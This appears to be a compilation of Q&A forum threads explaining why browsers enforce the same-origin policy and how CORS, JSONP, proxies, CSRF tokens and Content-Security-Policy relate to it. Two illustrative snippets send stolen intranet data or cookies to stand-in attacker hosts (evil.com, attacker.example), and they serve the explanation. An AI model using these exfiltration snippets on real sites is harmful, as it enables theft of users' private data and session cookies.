What is the rationale behind AJAX cross-domain security?

Given the simplicity of writing a server-side proxy that fetches data across domains, I'm at a loss as to what the initial intention was in preventing client-side AJAX from making calls across domains. I'm not asking for speculation; I'm looking for documentation from the language designers (or people close to them) about what they thought they were doing, other than simply creating a mild inconvenience for developers.

It's to prevent the browser from acting as a reverse proxy. Suppose you are browsing http://www.evil.com from a PC at your office, and suppose that office has an intranet with sensitive information at http://intranet.company.com which is only accessible from the local network.
If the cross-domain policy didn't exist, www.evil.com could make AJAX requests to http://intranet.company.com, using your browser as a reverse proxy, and then send that information to www.evil.com with another AJAX request.
This is one of the reasons for the restriction, I guess.
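To make the attack concrete, here is a minimal sketch of what a page on www.evil.com would try to run (the URLs and paths are hypothetical). With the Same-Origin Policy in place, the browser refuses to hand the intranet response to the script, so step two never happens:

```js
// Hypothetical attack script served by www.evil.com.
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://intranet.company.com/payroll'); // reachable only from the office LAN
xhr.onload = function () {
  // Step two: exfiltrate the stolen page to the attacker.
  var out = new XMLHttpRequest();
  out.open('POST', 'http://www.evil.com/collect');
  out.send(xhr.responseText);
};
xhr.send(); // the Same-Origin Policy blocks the script from reading this response
```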

If you're the author of myblog.com and you make an XHR to facebook.com, should the request send your Facebook cookie credentials? No, that would mean that you could request users' private Facebook information from your blog.
If you create a proxy service to do it, your proxy can't access the Facebook cookies.
You may also be questioning why JSONP is OK. The reason is that you're loading a script you didn't write, so unless Facebook's script decides to send you the information from its JS code, you won't have access to it.
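For contrast, here is roughly what a JSONP call looks like (the callback name and URL are made up). Because the cross-domain payload is a script the other server wrote, that server decides exactly what data, if any, the callback receives:

```js
// The page defines a global callback, then loads a <script> from the other
// domain; script tags are not subject to the Same-Origin Policy.
function apiCallback(data) {
  console.log('the server chose to share:', data);
}

var s = document.createElement('script');
// The server responds with a script that calls the function we named, e.g.
//   apiCallback({"public": "data"})
s.src = 'https://api.example.com/data?callback=apiCallback';
document.head.appendChild(s);
```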

The most important reason for this limit is a security concern: should a JSON request make the browser send and accept cookies or security credentials with a request to another domain? It is not a concern with a server-side proxy, because the proxy has no direct access to the client environment. There was a proposal for safe, sanitized JSON-specific request methods, but it hasn't been implemented anywhere yet.

The difference between direct access and a proxy is cookies and other security-relevant identification/verification information, which are strictly bound to one origin.
With those, your browser can access sensitive data. Your proxy can't, as it does not know the user's login data.
Therefore, the proxy is only applicable to public data; as is CORS.
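A sketch of that distinction with the modern fetch API (api.example.com is a placeholder): even when CORS allows a request, the user's cookies are only attached if the page asks for them and the server explicitly opts in:

```js
// No cookies sent: fine for public data, and no more than a proxy could get.
fetch('https://api.example.com/public');

// Ask the browser to attach the user's cookies for api.example.com. The
// browser will only expose the response if the server replies with
// Access-Control-Allow-Credentials: true and a non-wildcard
// Access-Control-Allow-Origin.
fetch('https://api.example.com/private', { credentials: 'include' });
```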

I know you are asking for experts' answers; I'm just a neophyte, and this is my opinion on why a server-side proxy is not a proper final solution:
Building a server-side proxy is not as easy as not building one at all.
It is not always possible, as with a third-party JS widget: you are not going to ask every publisher to declare a DNS record to integrate your widget, nor to modify the document.domain of their pages, with all the collateral issues that brings.
As I read in the book Third-Party JavaScript, "it requires loading an intermediary tunnel file before it can make cross-domain requests". At that point you are back to JSONP-style juggling, only trickier.
It is not supported by IE8; also from the above book: "IE8 has a rather odd bug that prevents a top-level domain from communicating with its subdomain even when they both opt into a common domain namespace".
There are several security issues, as people have explained in other answers; for even more, check chapter 4.3.2, "Message exchange using subdomain proxies", of the above book.
And the most important point for me:
It is a hack, like the JSONP solution. It's time for a standard, reliable, secure, clean and comfortable solution.
But, after re-reading your question, I think I still haven't answered it. So why this AJAX security? Again, I think the answer is:
Because you don't want any web page you visit to be able to make calls from your desktop to any computer or server inside your office's intranet.

Related

Cross Origin Post Request

I'm trying to send a POST request to a different site, specifically Zoho.eu, to enable me to log in with one click. Effectively I want to POST my username, password, etc. to the login URL.
I have run into the cross-origin problem, and I have looked at many different solutions such as JSONP, the iframe method, and CORS, but all of these require me to have access to the third-party backend, which I don't have.
How do I get around this problem? I understand I can use a proxy somehow to avoid the cross-origin problem, but I'm not sure how.
If I understand you correctly, then the short answer is: you can't.
A proxy won't help you create a session in the user's browser and log in. When using a proxy you are making the requests on behalf of the user from your server, and you can't set the required session values in the user's cookies for the target domain.
This is intentional. The whole concept of the Same-Origin Policy/CORS was invented so that others cannot do something on behalf of users on a domain they don't own.
I would consider OAuth; it might be the right way for you to implement this kind of cross-domain login flow.
One easy solution (which is only a temporary fix; you will have to find a more permanent solution for production code) is to hard-code the name of the server the requests will come from in your server controller code and allow access from it.
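A minimal sketch of that temporary fix, assuming a Node/Express backend (the origin and route names are placeholders):

```js
const express = require('express');
const app = express();

app.use((req, res, next) => {
  // Hard-coded origin: only pages from this site may read our responses
  // cross-origin. Replace with a proper whitelist for production.
  res.set('Access-Control-Allow-Origin', 'https://my-dev-site.example');
  next();
});

app.get('/status', (req, res) => res.json({ ok: true }));
app.listen(3000);
```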
CORS protection is intentional.
Zoho provides a cleaner way to authenticate against their site: OAuth integration. That is the cleaner way to integrate.
The steps are clearly documented here:
https://www.zoho.com/crm/help/api/using-authentication-token.html
Any other mode of authentication is not allowed and may be blocked by Zoho.

Understanding CORS security: what's the use of server allowing browser cross-domain access?

I just found out that in order to allow cross-domain AJAX calls, the Access-Control-Allow-Origin header should be set on the SERVER side. This looks frustrating to me; let me explain why:
1) The typical use case is that the client wants to make a cross-domain request. I have never heard of a server trying to restrict access from alien webpages. Oh, I remember 'prevent image hotlinking', a funny feature of my hosting, which can be easily beaten by sending a fake 'Referer' header.
2) Even if a server wanted to restrict connections from other domains, it would be impossible to do using the capabilities of the HTTP protocol. I suggest using tokens for that.
3) What's the use of blocking XMLHttpRequests while you can still use JSONP?
Can you explain why it is done this way?
For those who are still reading, there's a bonus question:
4) Do you know a way to prevent any cross-domain request from a webpage? Imagine a junior web developer creating a login form on a page that has ads or other scripts potentially sniffing passwords. Isn't this the essence of web security? Why isn't anyone talking about that?
I have never heard of a server trying to restrict access from alien webpages.
The Same Origin Policy is a restriction imposed by browsers, not servers.
CORS is the server telling the browser that it can relax its normal security because the data doesn't need that level of protection.
Even if a server wanted to restrict connections from other domains, it would be impossible to do using the capabilities of the HTTP protocol.
Which is why the HTTP protocol isn't used for that.
I suggest using tokens for that.
Using a nonce to protect against CSRF solves a different problem.
It's a relatively expensive solution that you only need to bring out when it is the side effects of the request that can be problematic (e.g. "Post a new comment"), rather than the data being passed back to JavaScript running on another site.
You couldn't use them instead of the Same Origin Policy to protect against reading data across origins because (without the Same Origin Policy) the attacking site would be able to read the token.
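To illustrate the pattern being discussed, here is a rough Express-style sketch of a CSRF nonce (it assumes session and body-parsing middleware are already configured; all route and field names are invented). The token only works because the Same-Origin Policy stops an attacking site from reading the page that contains it:

```js
const crypto = require('crypto');

// When serving the form, embed a per-session random token in the page.
app.get('/comment-form', (req, res) => {
  const token = crypto.randomBytes(16).toString('hex');
  req.session.csrfToken = token;
  res.send(`<form method="POST" action="/comment">
    <input type="hidden" name="csrf" value="${token}">
    <textarea name="body"></textarea>
  </form>`);
});

// Reject state-changing requests that don't echo the token back.
app.post('/comment', (req, res) => {
  if (req.body.csrf !== req.session.csrfToken) return res.sendStatus(403);
  // ...store the comment...
  res.sendStatus(201);
});
```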
What's the use of blocking XMLHttpRequests while you can still use JSONP?
You can't use JSONP unless the server provides the data in JSONP.
Providing the data in JSONP and using CORS to grant permission to access resources are two different ways that the server can allow the browser to access data that is normally protected by the Same Origin Policy.
JSONP was a hack. CORS came later and is more flexible (since it can allow access to any kind of data, respond to request methods other than GET, and allow custom HTTP headers to be added).
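As a sketch of that flexibility (Express-style, with illustrative names): a request with a custom header or a non-GET method triggers an OPTIONS preflight, and the server grants permission with response headers like these:

```js
// Answer the browser's preflight for /api/items.
app.options('/api/items', (req, res) => {
  res.set({
    'Access-Control-Allow-Origin': 'https://trusted.example',
    'Access-Control-Allow-Methods': 'GET, PUT, DELETE',
    'Access-Control-Allow-Headers': 'X-Custom-Header',
  });
  res.sendStatus(204);
});
```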
Can you explain why it is done this way?
The default policy is "No Access" since there is no way for the browser to know if the data being requested is public or not.
Consider this situation:
Alice has an account on Bob's website. That account is password protected and has information that should be kept secret between Alice and Bob (bank records or exam results, for example).
Mallory has another website. It uses Ajax to try to access Bob's site.
Without the Same Origin Policy, Alice might (while logged in to Bob's site) visit Mallory's website. Without Alice's knowledge or permission, Mallory's website sends JavaScript to Alice's browser that uses Ajax to fetch data from Bob's site. Since it is coming from Alice's browser, all of Alice's private information is given to the JavaScript. The JavaScript then sends it to Mallory.
This is clearly not a good thing.
The Same Origin Policy prevents that.
If Bob, as the person running the site, decides that the information is not secret and can be shared publicly, then he can use CORS or JSONP to provide access to it to JavaScript running on other sites.
Do you know a way to prevent any cross-domain request from a webpage?
No. The webpage is a single entity. Trying to police parts of it from other parts is a fool's errand.
Imagine a junior web developer creating a login form on a page that has ads or other scripts potentially sniffing passwords. Isn't this the essence of web security? Why isn't anyone talking about that?
"Be careful about trusting third party scripts" is something that doesn't get mentioned as much as it should be. Thankfully, most ad providers and CDN hosted libraries are supplied by reasonably trustworthy people.
Do you know an easy way of overcoming the problem of a missing Access-Control-Allow-Origin header?
Configure the server so it isn't missing.
Use JSONP instead
Use a proxy that isn't blocked by the same-origin policy to fetch the data instead (though you won't get any credentials the browser might send, because it is Alice, not your proxy, who has the account with Bob).

Secure JavaScript Running on 3rd Party Sites

We have a "widget" that runs on 3rd party websites, that is, anyone who signs up with our service and embeds the JavaScript.
At the moment we use JSONP for all communication. We can securely sign people in and create accounts via the use of an iframe and some magic with detecting load events on it. (Essentially, we wait until the iframe's source is pointing back to the client's domain before reading a success value out of its title.)
Because we're running on JSONP, we can use the browser's HTTP cookies to detect if the user is logged in.
However, we're in the process of transitioning our system to run in realtime over WebSockets. We will still have the same method for authentication, but we won't necessarily be making other calls using JSONP. Instead those calls will occur over WebSockets (using the Faye library).
How can I secure this? The potential security hole is that someone could copy the JavaScript off an existing site, alter it, then get people to visit their site instead. I think this defeats my original idea of sending back a secure token on login, as the malicious JavaScript would be able to read it and then use it to perform authenticated actions.
Am I better off keeping my secure actions running over regular JSONP and my updates over WebSockets?
WebSocket connections receive cookies only during the opening handshake. The only site that can access your WebSocket connection is the one that opened it, so if you're opening your connection after authentication, then I presume your security will be comparable to your current JSONP implementation.
That is not to say that your JSONP implementation is secure. I don't know that it isn't, but are you checking the referrers of your JSONP requests to ensure they're really coming from the same third-party site that logged in? If not, you already have a security issue from other sites embedding your JavaScript.
In any case, the 3rd-party having an XSS vulnerability would also be a very big problem, but presumably you know that already.
Whether the browser sends you cookies during the opening WebSocket handshake (and if so, which cookies) is not specified by the WS spec; it's left up to browser vendors.
A WS connection can be opened to any site, not only the site that originally served the JS making the connection. However, browsers MUST set the "Origin" HTTP header in the WS opening handshake to the origin that served the JS. The server is then free to accept or reject the connection, as sketched below.
You could, for example, generate a random string in JS, store it client-side, and let that plus the client IP take part in computing an auth token for the WS connection.
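A sketch of the Origin check using the popular Node 'ws' library (the whitelisted origin is invented):

```js
const { WebSocketServer } = require('ws');

const wss = new WebSocketServer({
  port: 8080,
  // Runs during the opening handshake; 'origin' is the browser-controlled
  // Origin header described above, so pages the browser loaded can't spoof it.
  verifyClient: ({ origin }) => origin === 'https://client-site.example',
});

wss.on('connection', (socket) => {
  socket.send('handshake accepted');
});
```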

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand it, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers that its page is allowed to access.
So the expanded sequence would be:
Supply a page with a list of acceptable CORS servers (abc.com, xyz.com, etc.)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list, and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (i.e. by the browser) because the server is not in the list
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply closing the script-tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even as far back as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests triggered by interfaces as simple as form.submit(), new Image, or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
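For example, a script that already holds the data needs nothing more than an image request to leak it; no XHR and no CORS involved:

```js
// Classic exfiltration trick: the browser happily issues a cross-origin GET
// for an "image", and the attacker reads the payload out of their server logs.
var stolen = document.cookie; // or anything else the malicious code can reach
new Image().src = 'https://attacker.example/log?d=' + encodeURIComponent(stolen);
```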
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making the cross-domain policy on other tags (script/image) stricter, while more secure, would break a lot of existing code and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure it's an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or, as you've requested here, you can explicitly tell the browser which domains the page is allowed to contact.
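For instance, a sketch of such a policy as an Express middleware (the two domains echo the whitelist from the question and are placeholders):

```js
app.use((req, res, next) => {
  // Disallow inline scripts, and restrict XHR/fetch/WebSocket targets
  // (connect-src) to the two whitelisted hosts.
  res.set(
    'Content-Security-Policy',
    "script-src 'self'; connect-src https://abc.com https://xyz.com"
  );
  next();
});
```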
The problem isn't that a site can access another site's resources that it already had access to. The problem is one of domain: if I'm using a browser at my company, and an AJAX script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution: CORS. I'm not saying it's the best, but it solves this issue.
1) If the gateway can't return the 'bobthehacker.com' accepted-origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the simple CORS case, it will actually still return the results by default, though you can configure the server to not even do that; either way the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over which headers are accepted and rejected, to make the requests from those sites conform to a certain shape.
Note: the ORIGIN and OPTIONS headers are controlled by the requester; obviously someone creating their own HTTP request can put whatever they want in there. However, a modern CORS-compliant browser WON'T do that. It is the browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer, and a whitelist served by the origin server seems to be a good approach.
Plus, this whitelist can be used to close existing loopholes (forms, the script tag, etc.); it's safe to assume that a server serving such a whitelist is designed to avoid backward-compatibility issues.

What are the disadvantages to using a PHP proxy to bypass the same-origin policy for XMLHttpRequest?

http://developer.yahoo.com/javascript/howto-proxy.html
Are there disadvantages to this technique? The advantage is obvious: you can use a proxy to get XML or JavaScript from another domain with XMLHttpRequest without running into same-origin restrictions. However, I do not hear about the disadvantages compared to other methods -- are there any, and what might they be?
Overhead - things are going to be a bit slower because you're going through an intermediary.
There are security issues if you allow access to any external site via the proxy - be sure to lock it down to the specific site (and probably the specific URL) of the resource you're proxying.
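The Yahoo article describes a PHP proxy; the same locking-down idea as a Node sketch (the whitelist entry is a placeholder, and the global fetch assumes Node 18+) might look like this:

```js
const http = require('http');

// Only these exact resources may be fetched through the proxy.
const ALLOWED = new Set(['https://feeds.example.com/news.xml']);

http.createServer(async (req, res) => {
  const target = new URL(req.url, 'http://localhost').searchParams.get('url');
  if (!ALLOWED.has(target)) {
    res.writeHead(403);
    return res.end('URL not whitelisted');
  }
  // Note the user's cookies for the target site never reach this server,
  // so the proxy can only ever relay public data.
  const upstream = await fetch(target);
  res.writeHead(upstream.status, { 'Content-Type': 'text/xml' });
  res.end(await upstream.text());
}).listen(8080);
```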
Overhead -- both for the user (who now has to wait for your server to make the request and receive data from the proxied source) and for you (as you're now taking on all the traffic for the other server in addition to your own).
Also security concerns: if you are using a proxy to bypass browser security checks for displaying untrusted content, you are deliberately sabotaging the browser security model, potentially allowing the user to be compromised. So unless you absolutely trust the server you are communicating with (that means no random ads and no user-defined content in the page(s) you are proxying), you should not do this.
I suppose there could be security considerations, though others are likely to be more qualified than me to address that. I've been running such a proxy on my personal site for a while now and haven't run into problems.
